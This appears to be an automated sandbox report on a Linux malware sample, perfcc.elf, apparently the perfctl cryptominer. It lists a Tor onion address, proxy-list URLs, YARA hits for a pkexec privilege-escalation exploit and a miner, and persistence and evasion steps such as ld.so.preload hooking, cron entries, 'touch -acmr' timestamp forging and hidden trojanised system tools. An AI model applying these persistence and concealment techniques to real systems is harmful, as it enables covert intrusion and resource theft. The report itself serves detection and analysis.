Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onion
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txthttps://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: /tmp/.perf.c/raid5wq (PID: 6269)

Reads hosts file: /etc/hosts

Jump to behavior

Source: /tmp/.perf.c/raid5wq (PID: 6269)	Socket: unknown address family	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Socket: 127.0.0.1:44869	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Socket: 127.0.0.1:44870	Jump to behavior
Source: /usr/sbin/sshd (PID: 6465)	Socket: 0.0.0.0:22
Source: /usr/sbin/sshd (PID: 6465)	Socket: [::]:22
Source: /lib/systemd/systemd-journald (PID: 6485)	Socket: unknown address family

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp

String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onion
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://6kzilz46krj47gfywu7qpc
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayReading/making
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://bugs.centos.org/
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	String found in binary or memory: https://bugs.launchpad.net/ubuntu/
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://bugzilla.redhat.com/
Source: perfcc.elf, perfcc0.35.dr, gpg-agent.484.dr, libfsnldev.so.120.dr, perfctl.35.dr	String found in binary or memory: https://gZ.~.
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: https://gcc.gnu.org/bugs
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is
Source: sedfK3s9f.220.dr	String found in binary or memory: https://gitlab.com/cryptsetup/cryptsetup/wikis/DMCrypt
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	String found in binary or memory: https://help.ubuntu.com/
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://pci-ids.ucw.cz/v2.2/pci.ids.gzindex
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txt
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://trac.torproject.org/8742
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/21155.
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.centos.org/
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.redhat.com/
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.torproject.org/
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warning
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warningThis
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	String found in binary or memory: https://www.ubuntu.com/
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	String found in binary or memory: https://www.ubuntu.com/legal/terms-and-policies/privacy-policy
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	String found in binary or memory: https://xmrig.com/wizard0

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: perfcc.elf, type: SAMPLE	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: 6252.1.000000000145c000.0000000001723000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: 6239.1.000000000145c000.0000000001723000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: 6620.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Malxmr_f35a670c Author: unknown
Source: 6620.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 6616.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Malxmr_f35a670c Author: unknown
Source: 6616.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, type: MEMORY	Matched rule: Detects VPNFilter malware Author: Florian Roth
Source: 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, type: MEMORY	Matched rule: Detects VPNFilter malware Author: Florian Roth
Source: Process Memory Space: perfcc.elf PID: 6239, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: Process Memory Space: sh PID: 6252, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: Process Memory Space: nohup PID: 6252, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: Process Memory Space: perfcc.elf PID: 6252, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: /usr/lib/libfsnldev.so, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: /tmp/.perf.c/gpg-agent, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: /tmp/.perf.c/raid5wq, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: /root/.config/cron/perfcc, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: /usr/lib/libpprocps.so, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown
Source: /usr/lib/libpprocps.so, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d Author: unknown

Source: libgcwrap.so.35.dr	ELF static info symbol of dropped file: pcap_loop
Source: libgcwrap.so0.35.dr	ELF static info symbol of dropped file: pcap_loop

Source: LOAD without section mappings

Program segment: 0x400000

Source: /usr/bin/kill (PID: 6699)

SIGKILL sent: pid: 6620, result: successful

Source: perfcc.elf, type: SAMPLE	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: 6252.1.000000000145c000.0000000001723000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: 6239.1.000000000145c000.0000000001723000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: 6620.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Malxmr_f35a670c reference_sample = a73808211ba00b92f8d0027831b3aa74db15f068c53dd7f20fcadb294224f480, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Malxmr, fingerprint = 9064024118d30d89bdc093d5372a0d9fefd43eb1ac6359dbedcf3b73ba93f312, id = f35a670c-7599-4c93-b08b-463c4a93808a, last_modified = 2021-09-16
Source: 6620.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 6616.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Cryptominer_Malxmr_f35a670c reference_sample = a73808211ba00b92f8d0027831b3aa74db15f068c53dd7f20fcadb294224f480, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Malxmr, fingerprint = 9064024118d30d89bdc093d5372a0d9fefd43eb1ac6359dbedcf3b73ba93f312, id = f35a670c-7599-4c93-b08b-463c4a93808a, last_modified = 2021-09-16
Source: 6616.1.0000000000400000.0000000000854000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_ELF_Tor_Client date = 2018-05-24, hash1 = afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719, author = Florian Roth, description = Detects VPNFilter malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_ELF_Tor_Client date = 2018-05-24, hash1 = afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719, author = Florian Roth, description = Detects VPNFilter malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: perfcc.elf PID: 6239, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: Process Memory Space: sh PID: 6252, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: Process Memory Space: nohup PID: 6252, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: Process Memory Space: perfcc.elf PID: 6252, type: MEMORYSTR	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: /usr/lib/libfsnldev.so, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: /tmp/.perf.c/gpg-agent, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: /tmp/.perf.c/raid5wq, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: /root/.config/cron/perfcc, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: /usr/lib/libpprocps.so, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22
Source: /usr/lib/libpprocps.so, type: DROPPED	Matched rule: Linux_Exploit_CVE_2021_4034_1c8f235d reference_sample = 94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b, os = linux, severity = x86, creation_date = 2022-01-26, scan_context = file, license = Elastic License v2, threat_name = Linux.Exploit.CVE-2021-4034, fingerprint = b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6, id = 1c8f235d-1345-4d5f-a5db-427dbbe6fc9a, last_modified = 2022-07-22

Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: ucnthnf.Slntaqm
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: vmgf..bg.Gmllws.Rbm/aewwjgeat/sh.Slncxokotjsl

Source: classification engine

Classification label: mal100.spre.troj.evad.mine.linELF@0/86@2/0

Persistence and Installation Behavior

Creates /etc/ld.so.preload

Source: /tmp/.perf.c/raid5wq (PID: 6269)

Created: /etc/ld.so.preload

Jump to behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 6369)	Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 6368)	Crontab executable: /usr/bin/crontab -> crontab -
Source: /tmp/.perf.c/raid5wq (PID: 6392)	Crontab executable: /bin/.local/bin/crontab -> /bin/.local/bin/crontab
Source: /bin/bash (PID: 6392)	Crontab executable: /bin/.local/bin/crontab -> /bin/.local/bin/crontab

Explicitly modifies time stamps using the "touch" command

Source: /bin/sh (PID: 6337)	Touch executable uses timestamp modification options: touch -acmr /bin/sh /bin/wizlmsh
Source: /bin/sh (PID: 6362)	Touch executable uses timestamp modification options: touch -acmr /bin/sh /bin/perfcc
Source: /bin/sh (PID: 6373)	Touch executable uses timestamp modification options: touch -acmr /bin/sh /root/.profile
Source: /bin/sh (PID: 6408)	Touch executable uses timestamp modification options: touch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/.perf.c/perfctl (PID: 6616)	File: /proc/6616/mounts
Source: /usr/share/unattended-upgrades/unattended-upgrade-shutdown (PID: 6586)	File: /proc/6586/mounts

Sample tries to persist itself using /etc/profile

Source: /tmp/.perf.c/raid5wq (PID: 6269)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 6327)

File: /etc/rcS.d/K01apparmor

Sample tries to persist itself using cron

Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /etc/cron.d/perfclean	Jump to behavior
Source: /usr/bin/crontab (PID: 6368)	File: /var/spool/cron/crontabs/tmp.trS8GJ
Source: /usr/bin/crontab (PID: 6368)	File: /var/spool/cron/crontabs/root

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 6520)	Killall command executed: killall -9 perfctl
Source: /bin/sh (PID: 6705)	Killall command executed: killall -9 obfs4proxy

Writes ELF files to hidden directories

Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /root/.config/cron/perfcc	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /usr/bin/.local/bin/top	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /usr/bin/.local/bin/htop	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /usr/bin/.local/bin/crontab	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /usr/bin/.local/bin/ldd	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written to hidden directory: /usr/bin/.local/bin/strace	Jump to dropped file
